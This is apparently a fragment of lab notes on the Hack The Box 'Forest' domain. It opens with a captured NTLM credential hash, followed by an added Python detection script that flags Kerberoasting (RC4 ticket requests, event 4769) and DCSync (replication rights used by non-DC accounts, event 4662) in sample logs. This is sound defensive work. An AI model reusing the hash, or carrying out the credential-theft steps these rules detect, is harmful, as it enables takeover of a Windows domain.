Credentials:
Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6
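Both the Kerberoast step earlier (requesting a service ticket for a service account and cracking it offline) and the DCSync request above leave a distinctive trace in the domain controller's Security log: a TGS request (event 4769) with RC4 encryption (TicketEncryptionType 0x17) for a user-account SPN, and a directory access (event 4662) in which a principal other than a domain controller exercises the DS-Replication-Get-Changes rights. The following detection logic is an added example, not part of the original notes or of mimikatz/kerberoast. The records in SAMPLE_EVENTS are constructed with the field names of the real events; FOREST$, HTB.LOCAL, Administrator and 10.10.14.27 come from the notes, and the other names (jdoe, svc-web, svc-backup) are made up for the sample.

```python
"""Detection logic for Kerberoasting (Security event 4769) and DCSync
(Security event 4662).

Added example, not part of the original notes. SAMPLE_EVENTS are
constructed records; in practice the same functions run over parsed EVTX
or SIEM rows. DC account names passed to detect_dcsync are an assumption.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4; AES tickets are 0x11/0x12

# Extended rights a replication partner needs; DCSync requests the same ones.
REPLICATION_RIGHTS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
)

SAMPLE_EVENTS: List[Dict] = [  # constructed
    # Normal: a user fetches an AES ticket for the DC's own services.
    {"EventID": 4769, "TargetUserName": "jdoe@HTB.LOCAL", "ServiceName": "FOREST$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.27"},
    # Suspicious: the same user requests RC4 tickets for several user-account SPNs.
    {"EventID": 4769, "TargetUserName": "jdoe@HTB.LOCAL", "ServiceName": "svc-web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.27"},
    {"EventID": 4769, "TargetUserName": "jdoe@HTB.LOCAL", "ServiceName": "svc-backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.27"},
    # Ignored: TGT renewals name krbtgt as the service.
    {"EventID": 4769, "TargetUserName": "jdoe@HTB.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.27"},
    # Expected: DC-to-DC replication performed by a DC machine account.
    {"EventID": 4662, "SubjectUserName": "FOREST$", "SubjectDomainName": "HTB",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Suspicious: a non-DC principal exercising replication rights.
    {"EventID": 4662, "SubjectUserName": "Administrator", "SubjectDomainName": "HTB",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Ignored: 4662 for an unrelated property (the user class schema GUID).
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "HTB",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def detect_kerberoast(events: List[Dict]) -> Dict[str, List[str]]:
    """Group RC4 service-ticket requests by requester, keeping only SPNs of
    user accounts (machine accounts end in '$'; krbtgt is the TGT service).
    One such request is already notable where service accounts support AES;
    many distinct SPNs in a short window is the bulk pattern a roasting tool
    leaves."""
    by_requester: Dict[str, set] = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4769 or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        service = e.get("ServiceName", "")
        if service.endswith("$") or service.lower().startswith("krbtgt"):
            continue
        by_requester[e.get("TargetUserName", "?")].add(service)
    return {user: sorted(spns) for user, spns in by_requester.items()}


def detect_dcsync(events: List[Dict],
                  dc_accounts: Tuple[str, ...] = ("FOREST$",)) -> List[Tuple[str, str]]:
    """Return (domain, subject) for 4662 events in which a principal outside
    dc_accounts used a replication extended right. Add legitimate replication
    identities (other DCs, a directory-sync service account) to dc_accounts."""
    hits: List[Tuple[str, str]] = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        props = e.get("Properties", "").lower()
        if not any(guid in props for guid in REPLICATION_RIGHTS):
            continue
        subject = e.get("SubjectUserName", "")
        if subject in dc_accounts:
            continue
        hits.append((e.get("SubjectDomainName", ""), subject))
    return hits


if __name__ == "__main__":
    print("RC4 service tickets by requester:", detect_kerberoast(SAMPLE_EVENTS))
    print("Replication rights used by non-DC principals:", detect_dcsync(SAMPLE_EVENTS))
```

Event 4662 is only written when "Audit Directory Service Access" is enabled and the domain object's SACL audits those rights, so the DCSync rule produces nothing on a DC with default auditing; the Kerberoast rule needs "Audit Kerberos Service Ticket Operations" for the same reason.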